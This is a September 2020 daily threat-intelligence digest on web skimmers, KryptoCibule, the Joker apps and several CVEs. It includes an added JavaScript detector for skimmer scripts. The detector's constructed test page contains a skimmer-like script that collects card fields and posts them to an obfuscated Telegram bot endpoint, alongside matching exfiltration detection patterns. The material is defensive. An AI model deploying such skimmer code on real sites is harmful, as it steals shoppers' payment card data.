Cyware Daily Threat Intelligence, September 02, 2020


The web skimming landscape is evolving as attackers continue to upgrade their skimmer code. In the latest development, skimming actors have been found using new skimmer code that uses Telegram as a channel to send stolen credit card details to its operators. The exfiltrated data includes billing details, credit card numbers, expiry dates, and CVV numbers.

A new malware family, KryptoCibule, capable of stealing cryptocurrency wallets and hijacking transactions has been spotted in the last 24 hours. It spreads via malicious torrents in archives pretending to be installers for pirated versions of popular software and games.

Researchers have also uncovered six malicious apps designed to distribute the notorious Joker malware. The apps were available on the Google Play Store and had accumulated a total of nearly 200,000 downloads.

Top Breaches Reported in the Last 24 Hours

Norwegian parliament attacked
The Norwegian parliament suffered a cyberattack last week that compromised the email accounts of several elected members and employees.

APA user data stolen
The American Payroll Association (APA) disclosed that some user data was stolen from its website in a digital skimming attack. The association explained that the attackers had exploited a vulnerability in its content management system to inject skimmer code into the login page and the checkout section of the website. The malicious activity was discovered on July 31, 2020, and had been present since May 13, 2020.

Top Malware Reported in the Last 24 Hours

Malicious apps
Six malicious apps designed to distribute Joker malware have been found on Google Play Store. The apps are Convenient Scanner 2, Safety AppLock, Push Message-Texting&SMS, Emoji Wallpaper, Separate Doc Scanner, and Fingertip GameBox. In total, these apps have been downloaded nearly 200,000 times.

KryptoCibule malware
Researchers have discovered a new malware family, KryptoCibule, that steals cryptocurrency wallets, hijacks transactions, and starts mining on infected machines. The malware relies heavily on the Tor network to communicate with its C2 servers. It spreads via malicious torrents in archives pretending to be installers for pirated versions of popular software and games.

New web skimmer code
Researchers have shared the first publicly documented instance of a credit card skimmer that uses Telegram to send stolen card details to its operators. On infected checkout pages, it looks for fields of interest such as billing, payment, credit card number, expiry date, and CVV.
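The field-harvesting behaviour described above lends itself to a quick static check of a checkout page's inline scripts. The following is an added example in JavaScript (Node), not code from the Cyware post or from the researchers who documented the skimmer: it flags a script that references several of the listed payment fields, reads form inputs or hooks form submission, and names an exfiltration endpoint. The Telegram Bot API hostname, the base64 decoding of string literals, and the sample page are assumptions constructed for the example.

```javascript
// Added example, not code from the Cyware post or from the researchers who
// documented the skimmer: a static triage heuristic for inline scripts on a
// checkout page. A script is flagged when it (a) references several of the
// payment fields the post lists, (b) reads form inputs or hooks submission,
// and (c) names an exfiltration endpoint. The Telegram Bot API host and the
// base64 handling are assumptions about how such a channel is reached and
// hidden; the sample page below is constructed.
const FIELD_KEYWORDS = [
  "billing", "payment", "cardnumber", "card_number", "ccnumber", "cc_number",
  "expiry", "expdate", "exp_date", "cvv", "cvc",
];
const EXFIL_PATTERNS = [
  /api\.telegram\.org\/bot/i, // Telegram Bot API base URL (assumed endpoint)
  /\/sendMessage\b/i,         // Bot API method for posting text to a chat
];
const COLLECTION_SINKS = [
  /querySelectorAll\s*\(\s*["'`]input/i,
  /getElementsByTagName\s*\(\s*["'`]input/i,
  /addEventListener\s*\(\s*["'`](submit|click)["'`]/i,
];

// Decode base64-looking string literals so an encoded endpoint is still seen.
function decodeBase64Literals(src) {
  const decoded = [];
  const re = /["'`]([A-Za-z0-9+/]{16,}={0,2})["'`]/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    const text = Buffer.from(m[1], "base64").toString("latin1");
    if (/^[\x20-\x7e]+$/.test(text)) decoded.push(text); // keep printable results only
  }
  return decoded;
}

// Score one script body: which field keywords, sinks and endpoints it contains.
function scoreScript(src) {
  const text = [src, ...decodeBase64Literals(src)].join("\n");
  const lower = text.toLowerCase();
  const fields = FIELD_KEYWORDS.filter((k) => lower.includes(k));
  const exfil = EXFIL_PATTERNS.filter((re) => re.test(text)).map((re) => re.source);
  const sinks = COLLECTION_SINKS.filter((re) => re.test(text)).length;
  return { fields, exfil, sinks, suspicious: fields.length >= 2 && sinks > 0 && exfil.length > 0 };
}

// Extract inline <script> bodies from a page and score each one in order.
function triagePage(html) {
  const results = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    results.push({ index: results.length, ...scoreScript(m[1]) });
  }
  return results;
}

// Constructed sample page: one external script, one benign analytics script,
// and one skimmer-like script whose endpoint is base64-encoded to mimic
// light obfuscation.
const ENCODED_ENDPOINT = Buffer.from("https://api.telegram.org/bot").toString("base64");
const SAMPLE_HTML = `
<script src="/static/app.js"></script>
<script>
  window.addEventListener("load", function () {
    navigator.sendBeacon("/analytics", JSON.stringify({ page: location.pathname }));
  });
</script>
<script>
  var u = atob("${ENCODED_ENDPOINT}");
  document.querySelector("form").addEventListener("submit", function () {
    var d = {};
    document.querySelectorAll("input").forEach(function (i) {
      if (/billing|payment|cc_number|expiry|cvv/i.test(i.name)) d[i.name] = i.value;
    });
    fetch(u + "/sendMessage", { method: "POST", body: JSON.stringify(d) });
  });
</script>`;

for (const r of triagePage(SAMPLE_HTML)) {
  console.log(`script #${r.index}: suspicious=${r.suspicious} fields=[${r.fields}] exfil=[${r.exfil}]`);
}
```

Run with node; on the constructed page only the third script is flagged. The heuristic is a triage aid for responders reviewing a compromised store, not a substitute for comparing deployed files against a known-good copy, and the endpoint list should be extended as other exfiltration channels are observed.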

Top Vulnerabilities Reported in the Last 24 Hours

File Manager flaw fixed
Users of the File Manager WordPress plugin, which bundles the elFinder file manager library, have been urged to update to the latest version following the discovery of a critical zero-day remote code execution vulnerability. The flaw, which carries a CVSS score of 10, allows unauthenticated attackers to upload malicious files and execute arbitrary code on vulnerable sites. It exists in versions 6.0 to 6.8 and has been patched in version 6.9.

Vulnerable Magmi plugin
An unpatched cross-site request forgery (CSRF) vulnerability in the Magmi plugin for Magento online stores can be abused to execute arbitrary code on servers running Magmi. The flaw, tracked as CVE-2020-5776, stems from the absence of random anti-CSRF tokens on Magmi's requests, so an attacker can trigger privileged actions by tricking a logged-in administrator into clicking a malicious link.

Vulnerable Accusoft ImageGear
Two vulnerabilities have been fixed in the Accusoft ImageGear library that could allow an attacker to execute code on the victim machine or corrupt the application's memory. The flaws, identified as CVE-2020-6151 and CVE-2020-6152, exist in the TIFF handle_COMPRESSION_PACKBITS and DICOM parse_dicom_meta_info functionalities of Accusoft ImageGear 19.7, respectively.


Posted on: September 02, 2020
